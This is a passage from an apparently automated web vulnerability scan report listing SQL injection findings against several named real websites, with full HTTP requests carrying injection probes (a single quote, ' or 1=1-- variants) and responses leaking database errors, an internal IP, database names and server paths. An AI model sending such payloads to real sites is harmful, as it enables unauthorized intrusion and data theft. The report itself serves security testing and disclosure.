Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Tour Unavailable</title>
<style type="text/css">
   body{
       margin:0;
       padding:0;
   }
   a{
   color:#9E2626;
   }
   a:hover{
    text-decoration:none;
   }
   .left {
       float:left;
   }
   #container {
       width:640px;
       margin:50px auto 20px auto;
       padding:0;
   }
   #container #content {
       margin-left: 200px;
   }
</style>
</head>
<body>
   <div id="container">
       <img class="left" src="images/alert_175x162.gif" height="162" width="175" border="0" />
       <div id="content">
           <h1>Oops!</h1>
           <p>The tour you have requested does not exist or is not currently available. Please <a href="mailto:support@sapha.com" title="Sapha Support">contact support</a> if you feel you have reached this page in error.</p>
       </div>
   </div>
</body>
</html>

2.22. http://tours.sapha.com/ [scs_tid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://tours.sapha.com
Path:   /

Issue detail

The scs_tid parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the scs_tid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /?scs_sid=2546&scs_tid=2545'&scscs=1 HTTP/1.1
Host: tours.sapha.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_tst_1=TRUE; sapha_1_19=110075%7C2676569%7C2668748%7C2011-05-06+16%3A05%3A33; sapha_2546_1=68004%7C40411%7C31540%7C2011-05-06+16%3A06%3A08

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:06:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 429

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: SELECT 1 FROM site_application t1 WHERE t1.site_application_isactive = 1 A
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

2.23. http://www.brownrudnick.com/nr/alertsArchv.asp [Year parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.brownrudnick.com
Path:   /nr/alertsArchv.asp

Issue detail

The Year parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the Year parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft Access.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /nr/alertsArchv.asp?Year=2006' HTTP/1.1
Cookie: ASPSESSIONIDSSSASTRS=AOLLAMJAKHMOMMMNLJCHGNIN
Host: www.brownrudnick.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: */*

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 06 May 2011 18:47:11 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 13913
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQRDRRTT=LPGCALMBHBMDBAFEOEDHOHHC; path=/
Cache-control: private

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Alerts and Newsletters -
...[SNIP]...
</i> Microsoft OLE DB Provider for ODBC Drivers<br>
...[SNIP]...

2.24. http://www.caribbean-ocean.com/accommodation2.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /accommodation2.php

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /accommodation2.php?id=8289' HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:35:51 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 10042

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<br /><br /><textarea rows="10" cols="100">SEL
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/accommodation2.php on line 34
<html>
...[SNIP]...

2.25. http://www.caribbean-ocean.com/accommodation2.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /accommodation2.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /accommodation2.php?id=/1'8289 HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:37:44 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 10070

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/1\'8289' at line 1<br /><br /><textarea rows="10" cols="10
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/accommodation2.php on line 34
<html>
...[SNIP]...

2.26. http://www.caribbean-ocean.com/get-image.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /get-image.php

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /get-image.php?id=18696' HTTP/1.1
Referer: http://www.caribbean-ocean.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.caribbean-ocean.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 16:00:06 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Content-Length: 934
Content-Type: image/jpg

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<br /><br /><textarea rows="10" cols="100">SEL
...[SNIP]...
</textarea>
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/get-image.php on line 15

Warning: fopen(../images/not-found.jpg): failed to open stream: No such file or directory in /home/chroot/home/james/safari/get-ima
...[SNIP]...

2.27. http://www.caribbean-ocean.com/get-image.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /get-image.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /get-image.php?id=1/1'8696 HTTP/1.1
Referer: http://www.caribbean-ocean.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.caribbean-ocean.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 16:00:17 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Content-Length: 940
Content-Type: image/jpg

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'8696' at line 1<br /><br /><textarea rows="10" cols="100"
...[SNIP]...
</textarea>
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/get-image.php on line 15

Warning: fopen(../images/not-found.jpg): failed to open stream: No such file or directory in /home/chroot/home/james/safari/get-ima
...[SNIP]...

2.28. http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Barbados%20Resort%20holidays/91

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /luxury%20Barbados%20Resort%20holidays/91' HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:35:57 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 6887

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

2.29. http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Jamaica%20Resort%20holidays/105

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /luxury%20Jamaica%20Resort%20holidays/105' HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:37:25 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 6888

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

2.30. http://www.dominionenterprises.com/main/do/Advertiser_Agreement [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dominionenterprises.com
Path:   /main/do/Advertiser_Agreement

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 35525155'%20or%201%3d1--%20 and 35525155'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /main/do/Advertiser_Agreement35525155'%20or%201%3d1--%20 HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725151554; s_lv=1304725151555; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:37:23 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=bdf614ab3757af735415e00061963d45; expires=Sun, 08 May 2011 19:37:23 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:37:23 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Content-Length: 32708

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Home</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Home">
   <meta name="keywords" content="Home">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">

<script language="javascript" type="text/javascript">
var IsIPad = false;
function QueryStringIsRequestFromMobile(DirectToFullSite) {
Queries = window.location.search.substring(1);
if (Queries == "" || Queries == null) {
return false;
}
else {
QueryArray = Queries.split("&");
for (i = 0; i < QueryArray.length; i++) {
QueryValue = QueryArray[i].split("=");
if (QueryValue[0] == DirectToFullSite) {
if (QueryValue[1] == "fs24lmj09")
return true;
else
return false;
}
else
return false;
}
}
}
function IsMobileRedirection() {
var agent = navigator.userAgent.toLowerCase();
var IsMobile = false;
if ((agent.indexOf('absinthe') != -1) ||
(agent.indexOf('albacore') !
...[SNIP]...

Request 2

GET /main/do/Advertiser_Agreement35525155'%20or%201%3d2--%20 HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725151554; s_lv=1304725151555; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:37:23 GMT
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=e7b89d9d22ee322e26c928d489ab60ae; expires=Sun, 08 May 2011 19:37:23 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:37:23 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Length: 0
Content-Type: text/html
Set-Cookie: TSa27990=17226455681a23b43340e174788d7a47cf55f197b0915ed34dc443f49c5eca853e60e59c; Path=/


2.31. http://www.dominionenterprises.com/main/do/Advertiser_Agreement [s_sq cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dominionenterprises.com
Path:   /main/do/Advertiser_Agreement

Issue detail

The s_sq cookie appears to be vulnerable to SQL injection attacks. The payloads 64212002'%20or%201%3d1--%20 and 64212002'%20or%201%3d2--%20 were each submitted in the s_sq cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /main/do/Advertiser_Agreement HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725151554; s_lv=1304725151555; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D64212002'%20or%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:35:57 GMT
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=dba9e76780dab5082f6ad3b40d81f7c9; expires=Sun, 08 May 2011 19:35:57 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:35:57 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Set-Cookie: TSa27990=a6085532e0617f3f26069bb7f806dc6988fcd6e4d06ed9974dc443569c5eca85b77317fc; Path=/
Content-Length: 34603

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Advertising User Agreement</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Advertising User Agreement">
   <meta name="keywords" content="Advertising User Agreement">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/style.css" type="text/css">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/menu.css" type="text/css">
   
   <!-- calendar stylesheet -->
   <link rel="stylesheet" type="text/css" media="all" href="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar-blue.css" title="win2k-cold-1" />

       
   <!-- main calendar program -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar.js"></script>
<!-- language for the calendar -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/lang/calendar-en.js"></script>
<!-- the following script defines the Calendar.setup helper function,
...[SNIP]...

Request 2

GET /main/do/Advertiser_Agreement HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725151554; s_lv=1304725151555; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D64212002'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:35:57 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=6fbc3a6086880dcc38961944854f905d; expires=Sun, 08 May 2011 19:35:57 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:35:57 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Content-Length: 34603

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Advertising User Agreement</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Advertising User Agreement">
   <meta name="keywords" content="Advertising User Agreement">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/style.css" type="text/css">
   <link rel="stylesheet" href="http://www.dominionenterprises.com/site/style/menu.css" type="text/css">
   
   <!-- calendar stylesheet -->
   <link rel="stylesheet" type="text/css" media="all" href="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar-blue.css" title="win2k-cold-1" />

       
   <!-- main calendar program -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/calendar.js"></script>
<!-- language for the calendar -->
<script type="text/javascript" src="http://www.dominionenterprises.com/site/scripts/jscalendar-1.0/lang/calendar-en.js"></script>
<!-- the following script defines the Calendar.setup helper function, which makes adding a calendar a matter of 1 or 2 lines of code. -->
<script type="text/javascript
...[SNIP]...

2.32. http://www.dominionenterprises.com/main/do/Careers [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dominionenterprises.com
Path:   /main/do/Careers

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 72254876'%20or%201%3d1--%20 and 72254876'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /main/do/Careers72254876'%20or%201%3d1--%20 HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725150345; s_lv=1304725150346; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:36:43 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=ad448786cf2b76ce54480dea55d64ae9; expires=Sun, 08 May 2011 19:36:43 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:36:43 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Content-Length: 32708

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Home</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Home">
   <meta name="keywords" content="Home">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">

<script language="javascript" type="text/javascript">
var IsIPad = false;
function QueryStringIsRequestFromMobile(DirectToFullSite) {
Queries = window.location.search.substring(1);
if (Queries == "" || Queries == null) {
return false;
}
else {
QueryArray = Queries.split("&");
for (i = 0; i < QueryArray.length; i++) {
QueryValue = QueryArray[i].split("=");
if (QueryValue[0] == DirectToFullSite) {
if (QueryValue[1] == "fs24lmj09")
return true;
else
return false;
}
else
return false;
}
}
}
function IsMobileRedirection() {
var agent = navigator.userAgent.toLowerCase();
var IsMobile = false;
if ((agent.indexOf('absinthe') != -1) ||
(agent.indexOf('albacore') !
...[SNIP]...

Request 2

GET /main/do/Careers72254876'%20or%201%3d2--%20 HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
